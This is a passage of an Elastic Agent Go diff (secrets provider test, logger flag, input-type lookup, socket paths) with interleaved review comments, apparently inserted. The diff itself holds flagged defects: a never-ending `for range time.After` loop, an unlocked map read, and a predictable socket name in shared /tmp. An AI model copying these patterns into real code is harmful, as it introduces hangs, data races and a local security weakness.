+ secret := &v1.Secret{ + TypeMeta: metav1.TypeMeta{ + Kind: "Secret", + APIVersion: "apps/v1beta1", + }, + ObjectMeta: metav1.ObjectMeta{ + Name: "testing_secret", + Namespace: ns, + }, + Data: map[string][]byte{ + "secret_value": []byte(pass), + }, + } + _, err := client.CoreV1().Secrets(ns).Create(context.Background(), secret, metav1.CreateOptions{}) + require.NoError(t, err) + + logger := logp.NewLogger("test_k8s_secrets") + cfg, err := config.NewConfigFrom(map[string]string{"a": "b"}) + require.NoError(t, err) + + p, err := ContextProviderBuilder(logger, cfg) + require.NoError(t, err) + + fp := p.(corecomp.FetchContextProvider) + + getK8sClientFunc = func(kubeconfig string) (k8sclient.Interface, error) { + return client, nil + } + require.NoError(t, err) + fp.Run(nil) + val, found := fp.Fetch("kubernetes_secrets.test_namespace.testing_secretHACK.secret_value") + assert.False(t, found) + assert.EqualValues(t, val, "") +} diff --git a/x-pack/elastic-agent/pkg/composable/providers/local/local.go b/x-pack/elastic-agent/pkg/composable/providers/local/local.go index 62fd2b65480..45a9f71f89a 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/local/local.go +++ b/x-pack/elastic-agent/pkg/composable/providers/local/local.go @@ -10,6 +10,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -22,7 +23,7 @@ type contextProvider struct { } // Run runs the environment context provider. -func (c *contextProvider) Run(comm composable.ContextProviderComm) error { +func (c *contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(c.Mapping) if err != nil { return errors.New(err, "failed to set mapping", errors.TypeUnexpected) 
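Review bot: Both tests overwrite the package-level `getK8sClientFunc` and never restore it, and they discard the error from `fp.Run(nil)`, so a failed client setup would show up only as a confusing `Fetch` assertion. Restoring the hook with `defer func() { getK8sClientFunc = getK8sClient }()` and asserting `require.NoError(t, fp.Run(nil))` would make each test self-contained. There is no case for the path where the client cannot be created, which is the one where `Fetch` runs with an unset client. The second `require.NoError(t, err)` after the hook assignment re-checks an error that was already checked.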
@@ -31,7 +32,7 @@ func (c *contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, c *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { p := &contextProvider{} if c != nil { err := c.Unpack(p) diff --git a/x-pack/elastic-agent/pkg/composable/providers/path/path.go b/x-pack/elastic-agent/pkg/composable/providers/path/path.go index 04e80a9ef41..990e1ecfbd2 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/path/path.go +++ b/x-pack/elastic-agent/pkg/composable/providers/path/path.go @@ -9,6 +9,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -19,7 +20,7 @@ func init() { type contextProvider struct{} // Run runs the Agent context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(map[string]interface{}{ "home": paths.Home(), "data": paths.Data(), @@ -33,6 +34,6 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/registry.go b/x-pack/elastic-agent/pkg/composable/registry.go index e9c8c0fb037..fa1acf59b4c 100644 
--- a/x-pack/elastic-agent/pkg/composable/registry.go +++ b/x-pack/elastic-agent/pkg/composable/registry.go @@ -21,7 +21,7 @@ type providerRegistry struct { // Providers holds all known providers, they must be added to it to enable them for use var Providers = &providerRegistry{ - contextProviders: make(map[string]ContextProviderBuilder, 0), - dynamicProviders: make(map[string]DynamicProviderBuilder, 0), + contextProviders: make(map[string]ContextProviderBuilder), + dynamicProviders: make(map[string]DynamicProviderBuilder), logger: logp.NewLogger("dynamic"), } diff --git a/x-pack/elastic-agent/pkg/config/operations/inspector.go b/x-pack/elastic-agent/pkg/config/operations/inspector.go index 35164ba649e..15ef586799f 100644 --- a/x-pack/elastic-agent/pkg/config/operations/inspector.go +++ b/x-pack/elastic-agent/pkg/config/operations/inspector.go @@ -8,6 +8,7 @@ import ( "fmt" "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" @@ -18,9 +19,14 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) +var ( + // ErrNoFleetConfig is returned when no configuration was retrieved from fleet just yet. + ErrNoFleetConfig = fmt.Errorf("no fleet config retrieved yet") +) + // LoadFullAgentConfig load agent config based on provided paths and defined capabilities. // In case fleet is used, config from policy action is returned. -func LoadFullAgentConfig(cfgPath string) (*config.Config, error) { +func LoadFullAgentConfig(cfgPath string, failOnFleetMissing bool) (*config.Config, error) { rawConfig, err := loadConfig(cfgPath) if err != nil { return nil, err 
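Review bot: The doc comment on `LoadFullAgentConfig` in `inspector.go` is not updated for the new `failOnFleetMissing` parameter, so callers have to read the body to learn when `ErrNoFleetConfig` is returned. I would add `// If failOnFleetMissing is true and no fleet config has been retrieved yet, ErrNoFleetConfig is returned instead of the last applied config.` to the comment. The function body continues outside this hunk.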
@@ -39,6 +45,10 @@ func LoadFullAgentConfig(cfgPath string) (*config.Config, error) { if err != nil { return nil, err } else if fleetConfig == nil { + if failOnFleetMissing { + return nil, ErrNoFleetConfig + } + // resolving fleet config but not fleet config retrieved yet, returning last applied config return rawConfig, nil } @@ -73,7 +83,7 @@ func loadConfig(configPath string) (*config.Config, error) { // merge local configuration and configuration persisted from fleet. rawConfig.Merge(config) - if err := InjectAgentConfig(rawConfig); err != nil { + if err := info.InjectAgentConfig(rawConfig); err != nil { return nil, err } @@ -103,5 +113,5 @@ func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { } func newErrorLogger() (*logger.Logger, error) { - return logger.NewWithLogpLevel("", logp.ErrorLevel) + return logger.NewWithLogpLevel("", logp.ErrorLevel, false) } diff --git a/x-pack/elastic-agent/pkg/core/composable/providers.go b/x-pack/elastic-agent/pkg/core/composable/providers.go new file mode 100644 index 00000000000..cbd2e1db4f4 --- /dev/null +++ b/x-pack/elastic-agent/pkg/core/composable/providers.go 
@@ -0,0 +1,29 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package composable + +import "context" + +// FetchContextProvider is the interface that a context provider uses so as to be able to be called +// explicitely on demand by vars framework in order to fetch specific target values like a k8s secret. +type FetchContextProvider interface { + ContextProvider + // Run runs the inventory provider. + Fetch(string) (string, bool) +} + +// ContextProviderComm is the interface that a context provider uses to communicate back to Elastic Agent. +type ContextProviderComm interface { + context.Context + + // Set sets the current mapping for this context. + Set(map[string]interface{}) error +} + +// ContextProvider is the interface that a context provider must implement. +type ContextProvider interface { + // Run runs the context provider. + Run(ContextProviderComm) error +} diff --git a/x-pack/elastic-agent/pkg/core/logger/logger.go b/x-pack/elastic-agent/pkg/core/logger/logger.go index 6169022fea6..2ef2ce7f16d 100644 --- a/x-pack/elastic-agent/pkg/core/logger/logger.go +++ b/x-pack/elastic-agent/pkg/core/logger/logger.go 
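Review bot: The comment above `Fetch` in `FetchContextProvider` reads `// Run runs the inventory provider.`, which describes a different method and leaves the meaning of the two return values undocumented. Something like `// Fetch returns the value for the given key and reports whether it was found.` matches how the Kubernetes secrets provider in this commit implements it. Since the returned string can be secret material, the comment could also state that callers must not log it. `explicitely` in the interface comment should be `explicitly`.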
@@ -30,33 +30,33 @@ type Logger = logp.Logger type Config = logp.Config // New returns a configured ECS Logger -func New(name string) (*Logger, error) { +func New(name string, logInternal bool) (*Logger, error) { defaultCfg := DefaultLoggingConfig() - return new(name, defaultCfg) + return new(name, defaultCfg, logInternal) } // NewWithLogpLevel returns a configured logp Logger with specified level. -func NewWithLogpLevel(name string, level logp.Level) (*Logger, error) { +func NewWithLogpLevel(name string, level logp.Level, logInternal bool) (*Logger, error) { defaultCfg := DefaultLoggingConfig() defaultCfg.Level = level - return new(name, defaultCfg) + return new(name, defaultCfg, logInternal) } // NewFromConfig takes the user configuration and generate the right logger. // TODO: Finish implementation, need support on the library that we use. -func NewFromConfig(name string, cfg *Config) (*Logger, error) { - return new(name, cfg) +func NewFromConfig(name string, cfg *Config, logInternal bool) (*Logger, error) { + return new(name, cfg, logInternal) } -func new(name string, cfg *Config) (*Logger, error) { +func new(name string, cfg *Config, logInternal bool) (*Logger, error) { commonCfg, err := toCommonConfig(cfg) if err != nil { return nil, err } var outputs []zapcore.Core - if cfg.ToFiles { + if logInternal { internal, err := makeInternalFileOutput(cfg) if err != nil { return nil, err diff --git a/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go b/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go index 5944afa4f0c..f2066bf04ec 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/beats/beats_monitor.go 
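Review bot: `New`, `NewWithLogpLevel` and `NewFromConfig` gain a bare `logInternal bool`, but none of their doc comments say what it controls, and call sites now read `logger.New("test", false)`. In `new`, the flag replaces `cfg.ToFiles` as the condition for building the output from `makeInternalFileOutput`, so a line such as `// logInternal enables the internal file output.` on each constructor would document it. The body of `new` continues outside the hunk.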
@@ -223,9 +223,7 @@ func monitoringDrop(path string) (drop string) { return "" } - if strings.HasPrefix(path, httpPlusPrefix) { - path = strings.TrimPrefix(path, httpPlusPrefix) - } + path = strings.TrimPrefix(path, httpPlusPrefix) // npipe is virtual without a drop if isNpipe(path) { diff --git a/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go b/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go index 3ece027a7aa..02b0c320d62 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/beats/monitoring.go @@ -5,7 +5,9 @@ package beats import ( + "crypto/sha256" "fmt" + "path/filepath" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" @@ -17,13 +19,9 @@ const ( // args: data path, install path, pipeline name, application name logFileFormatWin = "%s\\logs\\%s\\%s-json.log" - // args: pipeline name, application name - mbEndpointFileFormat = "unix:///tmp/elastic-agent/%s/%s/%s.sock" // args: pipeline name, application name mbEndpointFileFormatWin = `npipe:///%s-%s` - // args: pipeline name, application name - agentMbEndpointFileFormat = "unix:///tmp/elastic-agent/elastic-agent.sock" // args: pipeline name, application name agentMbEndpointFileFormatWin = `npipe:///elastic-agent` ) 
@@ -35,7 +33,14 @@ func getMonitoringEndpoint(spec program.Spec, operatingSystem, pipelineID string if operatingSystem == "windows" { return fmt.Sprintf(mbEndpointFileFormatWin, pipelineID, spec.Cmd) } - return fmt.Sprintf(mbEndpointFileFormat, pipelineID, spec.Cmd, spec.Cmd) + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), pipelineID, spec.Cmd, spec.Cmd)) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } func getLoggingFile(spec program.Spec, operatingSystem, installPath, pipelineID string) string { @@ -53,7 +58,14 @@ func AgentMonitoringEndpoint(operatingSystem string) string { if operatingSystem == "windows" { return agentMbEndpointFileFormatWin } - return agentMbEndpointFileFormat + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), "elastic-agent")) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } // AgentPrefixedMonitoringEndpoint returns endpoint with exposed metrics for agent. diff --git a/x-pack/elastic-agent/pkg/core/monitoring/monitor.go b/x-pack/elastic-agent/pkg/core/monitoring/monitor.go index 61ebdf3c771..00c7a50003a 100644 --- a/x-pack/elastic-agent/pkg/core/monitoring/monitor.go +++ b/x-pack/elastic-agent/pkg/core/monitoring/monitor.go 
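Review bot: The fallback branch in `getMonitoringEndpoint` (and the identical one in `AgentMonitoringEndpoint`) still puts the socket directly in the shared `/tmp` under a name derived only from the install path, so any local user can compute that name and create the path before the agent does. Whether the listener sets the socket mode or checks ownership is not visible in this diff; if it does not, the metrics endpoint is also reachable by other local users. Consider placing the fallback socket in an agent-owned directory created with mode 0700, and state the assumption in a comment, e.g. `// NOTE: /tmp is world-writable; the listener must create the socket with a restrictive mode`. The two blocks are duplicates and would be easier to keep in sync as one helper. The `len(path) < 104` check counts the `unix://` prefix, so it is stricter than the limit the comment names.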
@@ -7,10 +7,8 @@ package monitoring import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/beats" - monitoringConfig "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/config" ) // Monitor is a monitoring interface providing information about the way @@ -30,12 +28,6 @@ type Monitor interface { Close() } -// TODO: changeme -type wrappedConfig struct { - DownloadConfig *artifact.Config `yaml:"agent.download" config:"agent.download"` - MonitoringConfig *monitoringConfig.MonitoringConfig `config:"agent.monitoring" yaml:"agent.monitoring"` -} - // NewMonitor creates a monitor based on a process configuration. func NewMonitor(cfg *configuration.SettingsConfig) (Monitor, error) { return beats.NewMonitor(cfg.DownloadConfig, cfg.MonitoringConfig), nil diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/start.go b/x-pack/elastic-agent/pkg/core/plugin/process/start.go index e177a9882df..2a04bd8b656 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/start.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/start.go @@ -62,6 +62,8 @@ func (a *Application) start(ctx context.Context, t app.Taggable, cfg map[string] if err != nil { return err } + // Set input types from the spec + a.srvState.SetInputTypes(a.desc.Spec().ActionInputTypes) } if a.state.Status != state.Stopped { diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go b/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go index fe20029c94b..8f5f99e4679 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/watch_posix.go 
@@ -21,6 +21,9 @@ func (a *Application) externalProcess(proc *os.Process) { return } + for range time.After(1 * time.Second) { + + } for { select { case <-time.After(1 * time.Second): diff --git a/x-pack/elastic-agent/pkg/core/plugin/service/app.go b/x-pack/elastic-agent/pkg/core/plugin/service/app.go index 97196e0307f..b33561f305f 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/service/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/service/app.go @@ -38,19 +38,17 @@ var ( // Application encapsulates an application that is ran as a service by the system service manager. type Application struct { - bgContext context.Context - id string - name string - pipelineID string - logLevel string - desc *app.Descriptor - srv *server.Server - srvState *server.ApplicationState - limiter *tokenbucket.Bucket - startContext context.Context - tag app.Taggable - state state.State - reporter state.Reporter + bgContext context.Context + id string + name string + pipelineID string + logLevel string + desc *app.Descriptor + srv *server.Server + srvState *server.ApplicationState + limiter *tokenbucket.Bucket + state state.State + reporter state.Reporter uid int gid int diff --git a/x-pack/elastic-agent/pkg/core/server/server.go b/x-pack/elastic-agent/pkg/core/server/server.go index 97517eb6ce6..5dbdb5cd265 100644 --- a/x-pack/elastic-agent/pkg/core/server/server.go +++ b/x-pack/elastic-agent/pkg/core/server/server.go @@ -85,6 +85,8 @@ type ApplicationState struct { actionsConn bool actionsDone chan bool actionsLock sync.RWMutex + + inputTypes map[string]struct{} } // Handler is the used by the server to inform of status changes. 
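Review bot: The added `for range time.After(1 * time.Second) { }` in `externalProcess` never finishes: `time.After` returns a channel that delivers one value and is never closed, so the range blocks forever after the first tick and the `for { select { ... } }` watch loop below it is unreachable. If a one-second delay before watching is intended, `<-time.After(1 * time.Second)` does that; otherwise the three added lines should be removed. As written, the exit of an externally started process would presumably never be noticed by this watcher. The function body continues outside the hunk.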
@@ -193,6 +195,24 @@ func (s *Server) Get(app interface{}) (*ApplicationState, bool) { return foundState, foundState != nil } +// FindByInputType application by input type +func (s *Server) FindByInputType(inputType string) (*ApplicationState, bool) { + var foundState *ApplicationState + s.apps.Range(func(_ interface{}, val interface{}) bool { + as := val.(*ApplicationState) + if as.inputTypes == nil { + return true + } + + if _, ok := as.inputTypes[inputType]; ok { + foundState = as + return false + } + return true + }) + return foundState, foundState != nil +} + // Register registers a new application to connect to the server. func (s *Server) Register(app interface{}, config string) (*ApplicationState, error) { if _, ok := s.Get(app); ok { @@ -685,6 +705,16 @@ func (as *ApplicationState) SetStatus(status proto.StateObserved_Status, msg str return nil } +// SetInputTypes sets the allowed action input types for this application +func (as *ApplicationState) SetInputTypes(inputTypes []string) { + as.checkinLock.Lock() + as.inputTypes = make(map[string]struct{}) + for _, inputType := range inputTypes { + as.inputTypes[inputType] = struct{}{} + } + as.checkinLock.Unlock() +} + // updateStatus updates the current observed status from the application, sends the expected state back to the // application if the server expects it to be different then its observed state, and alerts the handler on the // server when the application status has changed. diff --git a/x-pack/elastic-agent/pkg/core/server/server_test.go b/x-pack/elastic-agent/pkg/core/server/server_test.go index 755cc0aaad2..b879d53728d 100644 --- a/x-pack/elastic-agent/pkg/core/server/server_test.go +++ b/x-pack/elastic-agent/pkg/core/server/server_test.go 
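Review bot: `FindByInputType` reads `as.inputTypes` without holding a lock, while `SetInputTypes` (the next hunk) replaces that map under `as.checkinLock`, so a lookup that runs while an application is starting is a data race on the map. Taking the same lock around the read, `as.checkinLock.Lock(); _, ok := as.inputTypes[inputType]; as.checkinLock.Unlock()`, closes it; use the read variant if `checkinLock` is an RWMutex, which is not visible here. In `SetInputTypes`, `defer as.checkinLock.Unlock()` right after the `Lock` would match the usual pattern. When two applications declare the same input type the result depends on the order in which `Range` visits them, which the doc comment could state.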
@@ -627,7 +627,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } @@ -741,7 +741,7 @@ func (*EchoAction) Name() string { return "echo" } -func (*EchoAction) Execute(request map[string]interface{}) (map[string]interface{}, error) { +func (*EchoAction) Execute(ctx context.Context, request map[string]interface{}) (map[string]interface{}, error) { echoRaw, ok := request["echo"] if !ok { return nil, fmt.Errorf("missing required param of echo") @@ -757,7 +757,7 @@ func (*SleepAction) Name() string { return "sleep" } -func (*SleepAction) Execute(request map[string]interface{}) (map[string]interface{}, error) { +func (*SleepAction) Execute(ctx context.Context, request map[string]interface{}) (map[string]interface{}, error) { sleepRaw, ok := request["sleep"] if !ok { return nil, fmt.Errorf("missing required param of slow") @@ -766,7 +766,15 @@ func (*SleepAction) Execute(request map[string]interface{}) (map[string]interfac if !ok { return nil, fmt.Errorf("sleep param must be a number") } - <-time.After(time.Duration(sleep)) + timer := time.NewTimer(time.Duration(sleep)) + defer timer.Stop() + + select { + case <-ctx.Done(): + return nil, ctx.Err() + case <-timer.C: + } + return map[string]interface{}{}, nil } @@ -777,7 +785,7 @@ func waitFor(check func() error) error { if err == nil { return nil } - if time.Now().Sub(started) >= 5*time.Second { + if time.Since(started) >= 5*time.Second { return fmt.Errorf("check timed out after 5 second: %s", err) } time.Sleep(10 * time.Millisecond) diff --git a/x-pack/elastic-agent/pkg/core/status/reporter_test.go b/x-pack/elastic-agent/pkg/core/status/reporter_test.go index 55fcd3e04fe..bc601155a43 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter_test.go 
+++ b/x-pack/elastic-agent/pkg/core/status/reporter_test.go @@ -14,7 +14,7 @@ import ( ) func TestReporter(t *testing.T) { - l, _ := logger.New("") + l, _ := logger.New("", false) t.Run("healthy by default", func(t *testing.T) { r := NewController(l) assert.Equal(t, Healthy, r.StatusCode()) diff --git a/x-pack/elastic-agent/pkg/crypto/io.go b/x-pack/elastic-agent/pkg/crypto/io.go index fca7cb6b188..be3751c5be7 100644 --- a/x-pack/elastic-agent/pkg/crypto/io.go +++ b/x-pack/elastic-agent/pkg/crypto/io.go @@ -217,7 +217,6 @@ type Reader struct { err error readHeader bool gcm cipher.AEAD - iv []byte buf []byte eof bool } diff --git a/x-pack/elastic-agent/pkg/crypto/io_test.go b/x-pack/elastic-agent/pkg/crypto/io_test.go index 46847643010..1e3bd24685f 100644 --- a/x-pack/elastic-agent/pkg/crypto/io_test.go +++ b/x-pack/elastic-agent/pkg/crypto/io_test.go @@ -29,7 +29,7 @@ func TestIO(t *testing.T) { require.Equal(t, len(msg), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -56,7 +56,7 @@ func TestIO(t *testing.T) { require.Equal(t, int64(len(msg)), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -81,7 +81,7 @@ func TestIO(t *testing.T) { require.Equal(t, len(msg), n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, []byte("bad password")) require.NoError(t, err) 
@@ -110,7 +110,7 @@ func TestIO(t *testing.T) { require.True(t, len(dest.Bytes()) > 0) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -136,7 +136,7 @@ func TestIO(t *testing.T) { require.True(t, n == 2048) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), msg) == -1) + require.False(t, bytes.Contains(dest.Bytes(), msg)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) @@ -151,6 +151,7 @@ func TestIO(t *testing.T) { t.Run("Missing explicit version", func(t *testing.T) { raw, err := randomBytes(2048) + require.NoError(t, err) c := bytes.NewBuffer(raw) r, err := NewReaderWithDefaults(c, []byte("bad password")) @@ -182,7 +183,7 @@ func TestIO(t *testing.T) { require.Equal(t, 19, n) // Guard to make sure we have not the same bytes. - require.True(t, bytes.Index(dest.Bytes(), expected) == -1) + require.False(t, bytes.Contains(dest.Bytes(), expected)) r, err := NewReaderWithDefaults(dest, passwd) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/eql/compare.go b/x-pack/elastic-agent/pkg/eql/compare.go index 9381f254fde..3c7c082f0c1 100644 --- a/x-pack/elastic-agent/pkg/eql/compare.go +++ b/x-pack/elastic-agent/pkg/eql/compare.go @@ -11,8 +11,6 @@ import ( type operand interface{} -type compare func(left, right operand) (bool, error) - func compareEQ(left, right operand) (bool, error) { switch v := left.(type) { case *null: @@ -367,8 +365,6 @@ func compareGTE(left, right operand) (bool, error) { } } -type logical func(left, right operand) (bool, error) - func logicalAND(left, right operand) (bool, error) { switch l := left.(type) { case bool: diff --git a/x-pack/elastic-agent/pkg/eql/expression.go b/x-pack/elastic-agent/pkg/eql/expression.go index eb0d5b08b4b..951074d3142 100644 
--- a/x-pack/elastic-agent/pkg/eql/expression.go +++ b/x-pack/elastic-agent/pkg/eql/expression.go @@ -33,7 +33,6 @@ var ( type Expression struct { expression string tree antlr.ParseTree - vars VarStore } // Eval evaluates the expression using a visitor and the provided methods registry, will return true diff --git a/x-pack/elastic-agent/pkg/eql/methods_str.go b/x-pack/elastic-agent/pkg/eql/methods_str.go index b7c49a61036..f32011a9431 100644 --- a/x-pack/elastic-agent/pkg/eql/methods_str.go +++ b/x-pack/elastic-agent/pkg/eql/methods_str.go @@ -84,9 +84,8 @@ func number(args []interface{}) (interface{}, error) { return nil, fmt.Errorf("number: argument 1 must be an integer; recieved %T", args[1]) } } - if strings.HasPrefix(input, "0x") { - input = input[2:] - } + input = strings.TrimPrefix(input, "0x") + n, err := strconv.ParseInt(input, base, 64) if err != nil { return nil, fmt.Errorf("number: failed to convert '%s' to integer", input) diff --git a/x-pack/elastic-agent/pkg/eql/visitor.go b/x-pack/elastic-agent/pkg/eql/visitor.go index f7d6ddffa79..3e7f633daf5 100644 --- a/x-pack/elastic-agent/pkg/eql/visitor.go +++ b/x-pack/elastic-agent/pkg/eql/visitor.go @@ -218,10 +218,7 @@ func (v *expVisitor) VisitExpArithmeticLT(ctx *parser.ExpArithmeticLTContext) in } func (v *expVisitor) VisitBoolean(ctx *parser.BooleanContext) interface{} { - if ctx.TRUE() != nil { - return true - } - return false + return ctx.TRUE() != nil } func (v *expVisitor) VisitArguments(ctx *parser.ArgumentsContext) interface{} { diff --git a/x-pack/elastic-agent/pkg/filewatcher/watcher.go b/x-pack/elastic-agent/pkg/filewatcher/watcher.go index 03619a04135..1961ce1f030 100644 --- a/x-pack/elastic-agent/pkg/filewatcher/watcher.go +++ b/x-pack/elastic-agent/pkg/filewatcher/watcher.go 
@@ -50,7 +50,7 @@ type Watch struct { func New(log *logger.Logger, f Comparer) (*Watch, error) { var err error if log == nil { - log, err = logger.New("watcher") + log, err = logger.New("watcher", false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go index 5c197289ed9..8767c4ad9b3 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/ack_cmd.go @@ -12,6 +12,7 @@ import ( "net/http" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const ackPath = "/api/fleet/agents/%s/acks" @@ -25,6 +26,11 @@ type AckEvent struct { AgentID string `json:"agent_id"` // : 'agent1', Message string `json:"message,omitempty"` // : 'hello2', Payload string `json:"payload,omitempty"` // : 'payload2', + + ActionData json.RawMessage `json:"action_data,omitempty"` // copy of original action data + StartedAt string `json:"started_at,omitempty"` // time action started + CompletedAt string `json:"completed_at,omitempty"` // time action completed + Error string `json:"error,omitempty"` // optional action error } // AckRequest consists of multiple actions acked to fleet ui. @@ -58,12 +64,12 @@ func (e *AckResponse) Validate() error { // AckCmd is a fleet API command. type AckCmd struct { - client clienter + client client.Sender info agentInfo } // NewAckCmd creates a new api command. -func NewAckCmd(info agentInfo, client clienter) *AckCmd { +func NewAckCmd(info agentInfo, client client.Sender) *AckCmd { return &AckCmd{ client: client, info: info, @@ -94,7 +100,7 @@ func (e *AckCmd) Execute(ctx context.Context, r *AckRequest) (*AckResponse, erro defer resp.Body.Close() if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } ackResponse := &AckResponse{} 
